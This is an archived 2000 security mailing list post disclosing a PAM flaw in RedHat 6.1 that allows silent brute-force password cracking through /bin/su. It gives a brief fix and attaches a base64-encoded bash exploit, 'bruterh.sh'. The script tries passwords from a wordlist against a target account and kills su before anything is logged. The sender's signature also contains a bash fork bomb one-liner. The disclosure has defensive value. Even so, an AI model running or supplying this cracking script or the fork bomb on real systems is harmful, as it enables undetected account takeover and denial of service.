RedHat 6.1 /and others/ PAM

From: Michal Zalewski (lcamtufat_private)
Date: Sun Jan 30 2000 - 03:12:16 PST

Next message: Cave, Glynis: "Re: Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV0001"

Previous message: Greg A. Woods: "Re: Future of s/key (Re: S/Key & OPIE Database Vulnerability)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--8323328-739699108-948744461=:838
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <lcamtuf.4.05.10001301212032.838at_private>

A vulnerability /feature?;)/ in PAM shipped with RedHat 6.1 allows
attacker to perform rapid brute-force password cracking attack without any
evidence in system logs.

Exploit attached.

Fix: do syslog() stuff before sleep() or change /bin/su behaviour in some
other way.

_______________________________________________________
Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

--8323328-739699108-948744461=:838
Content-Type: APPLICATION/X-SH; NAME="bruterh.sh"
Content-Transfer-Encoding: BASE64
Content-ID: <lcamtuf.4.05.10001242107410.838at_private>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="bruterh.sh"

IyEvYmluL2Jhc2gKCiMgKGMpIDE5OTkvMjAwMCA8bGNhbXR1ZkBpZHMucGw+
CiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMKIyBSZXF1aXJl
bWVudHM6CiMKIyAtIHdvcmtpbmcgL2Jpbi9zdQojIC0gcmVjZW50IFBBTSBp
bXBsZW1lbnRhdGlvbiAodGVzdGVkIHdpdGggUmVkSGF0IDUueCkKIyAtICd1
c2xlZXAnIGNvbW1hbmQgYW5kIGJhc2ggMS4xNC54IG9yIDIuMC54CiMKCkRF
U1RBQ0M9J3Rlc3R5JyAgICMgQWNjb3VudCB0byBjcmFjawpXT1JERklMRT0n
d29yZHMnICAjIFdvcmRmaWxlIHdpdGggcGFzc3dvcmRzIHRvIHRlc3QKCktJ
TExERUxBWT0wMyAgICAgICMgRGVsYXkgKGluIDEvMTAgc2VjKSB0byB3YWl0
IGZvciBzdSAoPDEwKQoKIyBFbmQgb2Ygc2V0dXAuCgpjbGVhcgplY2hvICJS
ZWRIYXQgLSBOb3RoaW5nSW5Mb2dzW3RtXSBCcnV0ZUZvcmNlKFIpIFBhc3N3
b3JkIENyYWNrIgplY2hvICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIgplY2hvICIgIC0gKGMpIDE5
OTkvMjAwMCwgTWljaGFsIFphbGV3c2tpIDxsY2FtdHVmQGlkcy5wbD4gLSAg
IgplY2hvIAoKaWYgWyAhICIkMSIgPSAiIiBdOyB0aGVuCiAgREVTVEFDQz0i
JDEiCmZpCgpLRD0kW0tJTExERUxBWSoxMDAwMDBdCgplY2hvICJbK10gQ29u
ZmlndXJlZCBhZ2FpbnN0IHVzZXIgJyRERVNUQUNDJywgd29yZGZpbGU6ICRX
T1JERklMRSIKZWNobyAiWytdIEtpbGwtZGVsYXkgc2V0IHRvICRLRCB1c2Vj
cy4uLiIKCgppZCAiJERFU1RBQ0MiICY+L2Rldi9udWxsCgppZiBbICEgIiQ/
IiA9ICIwIiBdOyB0aGVuCiAgZWNobyAiWy1dIEhtbSwgdXNlciAnJERFU1RB
Q0MnIG5vdCBmb3VuZCwgcGFyYW5vaWE/IgogIGVjaG8KICBleGl0IDAKZmkK
ClNITD0iYGdyZXAgIl4kREVTVEFDQzoiIC9ldGMvcGFzc3dkfGF3ayAtRjog
J3twcmludCAkN30nYCIKCmlmIFsgISAiJFNITCIgPSAiL2Jpbi9iYXNoIiBd
OyB0aGVuCiAgZWNobyAiWy1dIEhtbSwgdXNlciAnJERFU1RBQ0MnIGhhcyAk
U0hMIHNldCBhcyBzaGVsbCwgZXhwZWN0IHByb2JsZW1zLi4uIgpmaQoKZWNo
byAiWytdIERlc3RpbmF0aW9uIGFjY291bnQgaXMgYWxpdmUgYW5kIHdlbGwu
Li4iCgppZiBbICEgLWYgIiRXT1JERklMRSIgXTsgdGhlbgogIGVjaG8gIlst
XSBXb3JkZmlsZSAnJFdPUkRGSUxFJyBub3QgZm91bmQsIGNoZWNrIGl0LiIK
ICBlY2hvCiAgZXhpdCAwCmZpCgppZiBbICEgLXUgL2Jpbi9zdSBdOyB0aGVu
CiAgZWNobyAiWy1dIENhbid0IGZpbmQgK3Mgb24gL2Jpbi9zdSwgaGFjayBt
ZS4iCiAgZWNobwogIGV4aXQgMApmaQoKaWYgWyAhIC14IC9iaW4vc3UgXTsg
dGhlbgogIGVjaG8gIlstXSBIYXZlbid0ICt4IG9uIC9iaW4vc3UsIGhhY2sg
bWUuIgogIGVjaG8KICBleGl0IDAKZmkKCmVjaG8gIlsrXSAvYmluL3N1IHNl
ZW1zIHRvIGJlIGV4ZWN1dGFibGUgYW5kIHNldHVpZCwgaG9wZWZ1bGx5IGl0
IHdvcmtzLi4uIgoKaWYgWyAhIC14IC9iaW4vdXNsZWVwIF07IHRoZW4KICBl
Y2hvICJbLV0gTm8gL2Jpbi91c2xlZXAgaW4gdGhpcyBzeXN0ZW0uIEJlIGEg
aGFja2VyLiIKICBlY2hvCiAgZXhpdCAwCmZpCgppZiBbICIkVUlEIiA9ICIw
IiBdOyB0aGVuCiAgZWNobyAiWy1dIFJvb3Q/ISBZb3UgaWRpb3QuLi4iCiAg
ZWNobwogIGV4aXQgMApmaQoKZWNobyAiWytdIExldCdzIGdvIHN0cmFpZ2h0
IHRvIG51bWJlciBvbmUuLi4iCgpMTlM9ImBjYXQgJFdPUkRGSUxFIHwgd2Mg
LWx8YXdrICd7cHJpbnQgJDF9J2AiCkNOVD0wCgplY2hvICJbK10gV29yZGZp
bGUgJyRXT1JERklMRScgbG9hZGVkIC0gJExOUyBwYXNzd29yZHMuLi4iCmVj
aG8gIlsrXSBFc3RpbWF0ZWQgdGltZTogJFtMTlMqS0lMTERFTEFZLzI1XSBz
ZWNzLCBtYXg6ICRbTE5TKktJTExERUxBWS8xMF0gc2Vjcy4iCgp3aGlsZSBb
ICIkQ05UIiAtbHQgIiRMTlMiIF07IGRvCiAgQ05UPSRbQ05UKzFdCiAgUEFT
Uz0iYGhlYWQgLSRDTlQgJFdPUkRGSUxFfHRhaWwgLTFgIgogIGVjaG8gLW5l
ICJbP10gVHJ5aW5nICckUEFTUycgKCRDTlQvJExOUykuLi4gICAgICAgICAg
ICAgICAgXHIiCiAgZWNobyAiJFBBU1MiIHwgc3UgIiRERVNUQUNDIiAmPi9k
ZXYvbnVsbCAmCiAgdXNsZWVwICRLRAogIGtpbGwgLTkgJCEgJj4vZGV2L251
bGwKICBpZiBbICEgIiQ/IiA9ICIwIiBdOyB0aGVuCiAgICBlY2hvCiAgICBl
Y2hvICJbKl0gSHVoLCBpdCB3b3JrZWQuIEkndmUgdHJpZWQgcGFzc3dvcmQg
JyRQQVNTJyBmb3IgJyRERVNUQUNDJy4iCiAgICBlY2hvICJbK10gVGltZSB3
YXN0ZWQ6ICRbS0lMTERFTEFZKkNOVC8xMF0gc2Vjb25kcy4iCiAgICBlY2hv
ICJbK10gVGhhbmsgWW91LCBhbmQgaG9wZSB5b3UgZW5qb3llZCB5b3VyIHN0
YXkuIgogICAgZWNobwogICAgZXhpdCAwCiAgZmkKZG9uZQoKZWNobyAiWypd
IEhtbSwgZW5kIG9mIHdvcmRmaWxlLCBidXQgbm8gbWF0Y2hpbmcgcGFzc3dv
cmRzIDooIgplY2hvICJbK10gVGltZSB3YXN0ZWQ6ICRbS0lMTERFTEFZKkNO
VC8xMF0gc2Vjb25kcy4iCmVjaG8gIlsrXSBCYWQgZGF5LCB0cnkgYWdhaW4g
dG9tb3Jyb3c/IgplY2hvCmV4aXQgMAo=
--8323328-739699108-948744461=:838--

Next message: Cave, Glynis: "Re: Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory CISADV0001"
Previous message: Greg A. Woods: "Re: Future of s/key (Re: S/Key & OPIE Database Vulnerability)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:21 PDT